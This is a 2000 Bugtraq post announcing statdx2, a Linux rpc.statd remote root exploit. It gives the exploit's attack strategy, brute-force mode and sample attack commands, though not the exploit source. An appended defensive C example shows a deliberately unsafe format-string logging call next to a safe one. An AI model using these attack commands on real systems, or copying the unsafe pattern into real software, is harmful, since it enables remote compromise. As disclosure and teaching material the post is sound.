[17147] in bugtraq

statdx2 - linux rpc.statd revisited

daemon@ATHENA.MIT.EDU (ron1n -)
Tue Oct 10 23:41:29 2000

Message-Id:  <F61zDskqC5EtrUVYKkp000002f5@hotmail.com>
Date:         Wed, 11 Oct 2000 08:36:16 EST
Reply-To: ron1n - <shellcode@HOTMAIL.COM>
From: ron1n - <shellcode@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Hi.

I know this is getting old and boring now, but a lot of bugtraq readers
have sent me reports of problems experienced when auditing their systems,
and others have asked questions regarding the code's usage. Because of the
number of these emails, I decided to take down statdx from its dusty shelf
and remold it into something that will give more bang for the buck.

You know the drill -- use only in an ethical manner, don't destroy valuable
information, even domains five levels deep at the bottom of the global
interest hierarchy don't need a tagged HTML facelift, etc.

Attached is statdx2.tar.gz. It contains the following two files:

* gdb.txt   - how to get addresses with gdb (requested often)
* statdx2.c - the exploit itself (bug fixes, new stuff)

In another instance of keyboard diarrhea, here's the new introduction:

/**
*** statdx2 (the successor of statdx)
*** Linux rpc.statd remote root exploit
*** by ron1n <shellcode@hotmail.com>
*** October 10, 2000
***
*** $ ./statdx2 -h
***
*** This version supersedes my original release. The reason I chose to
*** resurrect this stale exploit is so the new incarnation would contain
*** many improvements over the first version.
***
*** There are major changes in the algorithm used in the exploit buffer
*** construction. The format string now uses "%hn" to eradicate several
*** rare but possible problems. I didn't know about the "$" trick when I
*** wrote statdx. Even though it seems to be the new trend, I decided to
*** ignore it for this particular exploit. An additional payload has been
*** added to allow remote execution of arbitrary commands. This should help
*** when the port-binding code can't be used.
***
*** There is now primitive brute forcing code which slightly increases
*** your chances of a successful exploitation against any vulnerable i386
*** distribution of Linux. In order to implement this, the attack strategy
*** had to be altered. A progressive brute force climb down the stack to
*** hit the correct address of the saved return address will cause problems
*** when the saved frame pointer is overwritten. Instead, an overwrite of
*** the saved frame pointer is used to cause redirection in the parent
*** epilog code (see phrack-55). This is much safer to use for brute
*** forcing and has the side benefit of being an alternative avenue of
*** attack when the usual target address contains a null byte. The null
*** byte truncation problem still exists when brute forcing though, so
*** use common sense.
***
*** The information below is based on numerous questions I receive.
***
*** common reasons for failure
*** --------------------------
*** o   Confusing statd with rstatd.
*** o   Attacking an architecture that isn't i386.
*** o   Attacking an operating system that isn't Linux.
*** o   Attacking a different distribution of Linux with the
***     default Redhat exploitation variables.
*** o   Attacking a system whose statd has crashed because of
***     previous exploitation attempts, successful or not.
***     The portmapper will still advertise statd even though
***     it will remain dead until restarted.
*** o   Attacking a patched system or a system with stack
***     protection. Stack protection will defeat this exploit.
***     I have seen a way to deliver the shellcode elsewhere
***     using a different procedure call, but I am not going
***     to steal that idea.
***
*** important notes
*** ---------------
*** o   The attack may be logged in syslog target locations.
*** o   Statd is a standalone service; be careful. Brute
***     forcing can be fatal. In fact, it's highly probable
***     that it will be fatal. The brute force mode exists
***     only to introduce a behavior-based form of blind
***     debugging with crashes mapping stack frames. This is
***     very difficult to do and it requires patience, but
***     it can be done.
*** o   The nature of the vulnerability provides no means
***     to examine the stack remotely, afaik. If anyone
***     wants to drop me a free clue about this, email me.
***
*** dotslash examples
*** -----------------
*** # default Redhat attack
*** $./statdx2 -d0 target
*** # default Redhat attack; new payload
*** $./statdx2 -d0 -c "touch /blah" target
*** # saved ebp overwrite (used automatically when desirable)
*** $./statdx2 -a 0xbffff2fc -f target
*** # brute force mode -- 50 iterations (-f option implied)
*** $./statdx2 -a 0xbffff004 -n 50 -s 20 target
***
**/
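As an added illustration of the bug class the post exploits (this is not part of ron1n's message or the attached statdx2.c): the rpc.statd hole was untrusted request text reaching syslog(3) as the format string itself. The helpers below are hypothetical, and snprintf() stands in for syslog() so the vulnerable and hardened patterns can be compared offline.

```c
#include <stdio.h>
#include <string.h>

/* Silence the compiler's (correct) complaint about the deliberately
 * unsafe call so the contrast below compiles cleanly. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

/* Vulnerable pattern (hypothetical helper, constructed for this example):
 * the untrusted string is itself the format, so every '%' directive in it
 * is interpreted. rpc.statd's bug was this shape with a request field
 * reaching syslog(3); snprintf() is used here so it runs stand-alone. */
int log_unsafe(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, untrusted);
}

/* Hardened pattern: a fixed format, the untrusted text passed as a %s
 * argument. The same input is now copied literally. */
int log_safe(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, "%s", untrusted);
}

/* Cheap input check a daemon can apply before logging: a hostname field
 * never legitimately contains '%', so its presence marks the request as
 * malformed and worth logging (safely) and dropping. */
int has_format_directive(const char *s)
{
    return strchr(s, '%') != NULL;
}

/* Returns 1 when the unsafe and safe renderings of s differ, i.e. when the
 * input would have been interpreted instead of logged verbatim. Only the
 * harmless "%%" directive is exercised here; anything consuming arguments
 * would be undefined behaviour in log_unsafe(), which is the whole point. */
int rendering_differs(const char *s)
{
    char a[128], b[128];
    log_unsafe(a, sizeof a, s);
    log_safe(b, sizeof b, s);
    return strcmp(a, b) != 0;
}

int main(void)
{
    const char *benign = "client.example.test";  /* constructed sample */
    const char *odd    = "host%%name";            /* constructed sample */
    printf("differs: %d %d\n", rendering_differs(benign), rendering_differs(odd));
    printf("flagged: %d %d\n", has_format_directive(benign), has_format_directive(odd));
    return 0;
}
```

Building with gcc -Wformat-security (or -Werror=format-security) reports the unsafe call at compile time, which is the cheapest way to find this pattern across a code base.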